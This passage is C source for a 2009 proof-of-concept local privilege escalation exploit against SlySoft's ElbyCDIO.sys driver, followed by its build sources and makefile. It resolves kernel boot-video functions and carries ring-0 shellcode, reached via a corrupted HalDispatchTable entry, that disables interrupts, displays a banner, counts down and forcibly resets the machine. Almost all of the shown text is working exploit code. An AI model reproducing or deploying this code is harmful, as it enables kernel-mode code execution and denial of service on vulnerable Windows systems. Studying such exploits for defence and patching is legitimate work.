                                      (PVOID*)&InbvSolidColorFill);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSolidColorFill - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSolidColorFill -= MappedBase;
    (ULONG)InbvSolidColorFill += ImageBase;


    //
    // InbvSetTextColor
    //

    RtlInitAnsiString(&ProcedureName, "InbvSetTextColor");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvSetTextColor);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetTextColor - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSetTextColor -= MappedBase;
    (ULONG)InbvSetTextColor += ImageBase;


    //
    // InbvInstallDisplayStringFilter
    //

    RtlInitAnsiString(&ProcedureName, "InbvInstallDisplayStringFilter");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvInstallDisplayStringFilter);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvInstallDisplayStringFilter - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvInstallDisplayStringFilter -= MappedBase;
    (ULONG)InbvInstallDisplayStringFilter += ImageBase;


    //
    // InbvEnableDisplayString
    //

    RtlInitAnsiString(&ProcedureName, "InbvEnableDisplayString");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvEnableDisplayString);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvEnableDisplayString - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvEnableDisplayString -= MappedBase;
    (ULONG)InbvEnableDisplayString += ImageBase;


    //
    // InbvSetScrollRegion
    //

    RtlInitAnsiString(&ProcedureName, "InbvSetScrollRegion");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvSetScrollRegion);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetScrollRegion - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSetScrollRegion -= MappedBase;
    (ULONG)InbvSetScrollRegion += ImageBase;


    //
    // InbvDisplayString
    //

    RtlInitAnsiString(&ProcedureName, "InbvDisplayString");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvDisplayString);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvDisplayString - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvDisplayString -= MappedBase;
    (ULONG)InbvDisplayString += ImageBase;


    // Diagnostic dump of the rebased kernel addresses (%X on a pointer is
    // fine only because everything here is 32-bit).
    printf(" +----------------------------------------------------------------------------+\n"
           " | InbvAcquireDisplayOwnership - 0x%.8X                                   |\n"
           " | InbvResetDisplay - 0x%.8X                                              |\n"
           " | InbvSolidColorFill - 0x%.8X                                            |\n"
           " | InbvSetTextColor - 0x%.8X                                              |\n"
           " | InbvInstallDisplayStringFilter - 0x%.8X                                |\n"
           " | InbvEnableDisplayString - 0x%.8X                                       |\n"
           " | InbvSetScrollRegion - 0x%.8X                                           |\n"
           " | InbvDisplayString - 0x%.8X                                             |\n"
           " +----------------------------------------------------------------------------+\n\n",
           InbvAcquireDisplayOwnership,
           InbvResetDisplay,
           InbvSolidColorFill,
           InbvSetTextColor,
           InbvInstallDisplayStringFilter,
           InbvEnableDisplayString,
           InbvSetScrollRegion,
           InbvDisplayString);

    // ProcedureName.Buffer points at the "InbvDisplayString" literal
    // (RtlInitAnsiString never allocates), so this hands a non-heap pointer
    // to the heap free routine. It should be removed.
    RtlFreeAnsiString(&ProcedureName);

    return STATUS_SUCCESS;
}

//
// VOID InbvShellCode(VOID)
// Never called from user mode. main() copies one page starting at this
// function's first byte into the null page, and the kernel later transfers
// control there through the corrupted HalDispatchTable[1] slot, so this body
// runs in ring 0 inside the calling process's address space. It takes over
// the boot-video display through the Inbv* pointers XxInitInbv filled in,
// paints the banner, counts down with busy loops, and finally resets the
// machine through the keyboard controller. It does not return and it does
// not elevate any process: the PoC only demonstrates kernel-mode execution.
// The four local arrays are initialised at run time by compiler-generated
// code in the prologue, so the copy must start at the function's entry for
// the `lea` references below to be valid.
// MSVC inline asm, Intel syntax; `call <global>` is encoded as a call
// through the pointer variable, and every callee is __stdcall (callee pops).
//
VOID InbvShellCode()
{
    UCHAR BugCheck01[] = " 3";
    UCHAR BugCheck02[] = " 2";
    UCHAR BugCheck03[] = " 1";
    UCHAR BugCheck04[] = " Rebooting ...";
    UCHAR BugCheckString[] =            // 80-column lines: one screen line each at 640x480 text
    "                                                                                "
    " SlySoft Inc. - http://www.slysoft.com/                                         "
    "                                                                                "
    " Affected Software:                                                             "
    " CloneCD < 5.3.1.4                                                              "
    " CloneDVD < 2.9.2.2                                                             "
    " Virtual CloneDrive < 5.4.2.5                                                   "
    " AnyDVD & AnyDVD HD < 6.5.2.8                                                   "
    "                                                                                "
    " Affected Driver:                                                               "
    " ElbyCD Windows NT/2000/XP I/O driver - ElbyCDIO.sys 6.0.3.2                    "
    "                                                                                "
    " Local Privilege Escalation Exploit                                             "
    " For Educational Purposes Only !                                                "
    "                                                                                "
    "                                                                                "
    " NT Internals - http://www.ntinternals.org/                                     "
    " alex ntinternals org                                                           "
    " 18 March 2009                                                                  "
    "                                                                                "
 " CloneCD/DVD & Virtual CloneDrive & AnyDVD/HD Multiple Vulnerabilities          "
 " NTIADV0812 - http://www.ntinternals.org/ntiadv0812/ntiadv0812.html             "
 "                                                                                "
    " References:                                                                    "
    " Exploiting Common Flaws in Drivers                                             "
    " Ruben Santamarta - http://www.reversemode.com/                                 "
    "                                                                                "
    "                                                                                ";

    __asm
    {
        //
        // KeDisableInterrupts
        //
        // eax = (EFLAGS.IF ? 1 : 0) -- bit 9 isolated and shifted down.
        // The value is never used (eax is overwritten by `lea` below) and
        // there is no matching sti: interrupts stay off until the reset.
        pushf
        pop eax
        and eax, 0x0200
        shr eax, 0x09
        cli
       
        //
        // Preparing Screen
        //
        call InbvAcquireDisplayOwnership
       
        call InbvResetDisplay
 
        sub esi, esi                    // esi = 0 (xor esi, esi is the usual idiom)
        push 0x04                       // Color
        mov edi, 0x01DF                 // 479
        push edi                        // Height
        mov ebx, 0x027F                 // 639
        push ebx                        // Width
        push esi                        // Top  = 0
        push esi                        // Left = 0
        call InbvSolidColorFill         // InbvSolidColorFill(0, 0, 639, 479, 4): clear a 640x480 area
       
        push 0x0F
        call InbvSetTextColor           // InbvSetTextColor(0x0F)
       
        push esi
        call InbvInstallDisplayStringFilter // no filter (NULL)
       
        inc esi                         // esi = 1
        push esi
        call InbvEnableDisplayString    // InbvEnableDisplayString(TRUE)
       
        dec edi
        dec edi                         // edi = 0x1DD (477)
        push edi                        // Height
        push ebx                        // Width = 639
        dec esi                         // esi = 0
        push esi                        // Top
        push esi                        // Left
        call InbvSetScrollRegion        // InbvSetScrollRegion(0, 0, 639, 477)
       
        lea eax, BugCheckString         // stack-resident copy built by the prologue
        push eax
        call InbvDisplayString
           
        mov esi, 0x80000000             // loop count for each one-step delay (2^31 iterations)
        mov ecx, esi
       
        //
        // Countdown
        //
        // Busy-wait delays with interrupts off; wall-clock duration depends
        // entirely on the CPU.
    __loop01:
        dec ecx
        jnz __loop01
       
        lea eax, BugCheck01
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop02:
        dec ecx
        jnz __loop02

        lea eax, BugCheck02
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop03:
        dec ecx
        jnz __loop03

        lea eax, BugCheck03
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop04:
        dec ecx
        jnz __loop04

        lea eax, BugCheck04
        push eax
        call InbvDisplayString

        mov ecx, esi
        shl ecx, 0x01                   // 0x80000000 << 1 wraps to 0; dec/jnz from 0 then runs 2^32 times, which is the doubled delay intended

    __loop05:
        dec ecx
        jnz __loop05
       
        //
        // Resetting Processor
        //
        // Writes command 0xFE to the 8042 keyboard controller: pulse the CPU
        // reset line. `out` and the earlier `cli` are privileged; they only
        // work because this runs in ring 0.
        mov al, 0xFE
        out 0x64, al
    }
}

----------------------------------------------------sources------------------------------------------------------

TARGETNAME=ElbyCDIO_Exp
TARGETPATH=obj
TARGETTYPE=PROGRAM
SOURCES=ElbyCDIO_Exp.c
UMTYPE=console
UMBASE=0x00400000
TARGETLIBS=$(DDK_LIB_PATH)\ntdll.lib

----------------------------------------------------makefile-----------------------------------------------------

!INCLUDE $(NTMAKEENV)\makefile.def


 